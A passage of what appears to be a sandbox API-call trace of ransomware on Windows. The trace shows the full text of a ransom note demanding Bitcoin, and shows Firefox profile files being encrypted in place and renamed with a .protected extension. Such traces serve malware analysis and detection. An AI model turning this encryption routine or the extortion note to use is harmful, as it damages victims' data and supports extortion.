lpFindFileData=0x295e2f0) returned 0 [0090.529] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.529] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\RESTORE_FILES.txt") returned 125 [0090.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.530] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.530] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.531] lstrlenA (lpString="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") returned 684 [0090.531] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.531] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.531] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.531] CloseHandle (hObject=0x154) returned 1 [0090.531] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="Windows") returned -1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="Program Files") returned -1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="Program Files (x86)") returned -1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="$Recycle.bin") returned 1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="System Volume Information") returned -1 [0090.531] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 100 [0090.531] StrStrIW (lpFirst="cert8.db", lpSrch=".protected") returned 0x0 [0090.531] lstrcmpW (lpString1="cert8.db", lpString2="RESTORE_FILES.txt") returned -1 [0090.532] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.532] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 100 [0090.532] StrStrW (lpFirst="cert8.db", lpSrch=".txt") returned 0x0 [0090.532] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 100 [0090.532] StrStrW (lpFirst="cert8.db", lpSrch=".rar") returned 0x0 [0090.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 100 [0090.532] StrStrW (lpFirst="cert8.db", lpSrch=".zip") returned 0x0 [0090.533] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.534] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.534] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.534] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.534] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.535] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.535] CloseHandle (hObject=0x154) returned 1 [0090.537] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.protected") returned 110 [0090.537] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.protected")) returned 1 [0090.538] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="Windows") returned -1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="Program Files") returned -1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="Program Files (x86)") returned -1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="$Recycle.bin") returned 1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="System Volume Information") returned -1 [0090.538] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 109 [0090.538] StrStrIW (lpFirst="compatibility.ini", lpSrch=".protected") returned 0x0 [0090.538] lstrcmpW (lpString1="compatibility.ini", lpString2="RESTORE_FILES.txt") returned -1 [0090.539] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.539] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 109 [0090.539] StrStrW (lpFirst="compatibility.ini", lpSrch=".txt") returned 0x0 [0090.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 109 [0090.539] StrStrW (lpFirst="compatibility.ini", lpSrch=".rar") returned 0x0 [0090.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 109 [0090.539] StrStrW (lpFirst="compatibility.ini", lpSrch=".zip") returned 0x0 [0090.539] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xce, lpOverlapped=0x0) returned 1 [0090.540] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.540] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xce, lpOverlapped=0x0) returned 1 [0090.540] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.540] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.541] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.541] CloseHandle (hObject=0x154) returned 1 [0090.541] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.protected") returned 119 [0090.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.protected")) returned 1 [0090.542] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Windows") returned -1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Program Files") returned -1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Program Files (x86)") returned -1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="$Recycle.bin") returned 1 [0090.542] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="System Volume Information") returned -1 [0090.542] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 112 [0090.542] StrStrIW (lpFirst="content-prefs.sqlite", lpSrch=".protected") returned 0x0 [0090.542] lstrcmpW (lpString1="content-prefs.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 112 [0090.542] StrStrW (lpFirst="content-prefs.sqlite", lpSrch=".txt") returned 0x0 [0090.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 112 [0090.542] StrStrW (lpFirst="content-prefs.sqlite", lpSrch=".rar") returned 0x0 [0090.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 112 [0090.543] StrStrW (lpFirst="content-prefs.sqlite", lpSrch=".zip") returned 0x0 [0090.543] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, 
lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.547] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.547] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.547] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.547] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.547] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.547] CloseHandle (hObject=0x154) returned 1 [0090.547] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.protected") returned 122 [0090.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.protected")) returned 1 [0090.548] 
FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Windows") returned -1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Program Files") returned -1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Program Files (x86)") returned -1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="$Recycle.bin") returned 1 [0090.548] lstrcmpiW (lpString1="cookies.sqlite", lpString2="System Volume Information") returned -1 [0090.548] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 106 [0090.548] StrStrIW (lpFirst="cookies.sqlite", lpSrch=".protected") returned 0x0 [0090.548] lstrcmpW (lpString1="cookies.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.548] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.548] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 106 [0090.549] StrStrW (lpFirst="cookies.sqlite", lpSrch=".txt") returned 0x0 [0090.549] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 106 [0090.549] StrStrW (lpFirst="cookies.sqlite", lpSrch=".rar") returned 0x0 [0090.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 106 [0090.549] StrStrW (lpFirst="cookies.sqlite", lpSrch=".zip") returned 0x0 [0090.549] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.561] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.562] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.562] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.562] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.580] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.580] CloseHandle (hObject=0x154) returned 1 [0090.580] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.protected") returned 116 
[0090.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.protected")) returned 1 [0090.581] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="Windows") returned -1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="Program Files") returned -1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="Program Files (x86)") returned -1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="$Recycle.bin") returned 1 [0090.581] lstrcmpiW (lpString1="downloads.sqlite", lpString2="System Volume Information") returned -1 [0090.581] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 108 [0090.581] StrStrIW (lpFirst="downloads.sqlite", lpSrch=".protected") returned 0x0 [0090.581] lstrcmpW (lpString1="downloads.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.581] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.581] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 108 [0090.583] StrStrW (lpFirst="downloads.sqlite", lpSrch=".txt") returned 0x0 [0090.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 108 [0090.583] StrStrW (lpFirst="downloads.sqlite", lpSrch=".rar") returned 0x0 [0090.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned 108 [0090.583] StrStrW (lpFirst="downloads.sqlite", lpSrch=".zip") returned 0x0 [0090.583] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.598] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.598] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.599] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.599] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, 
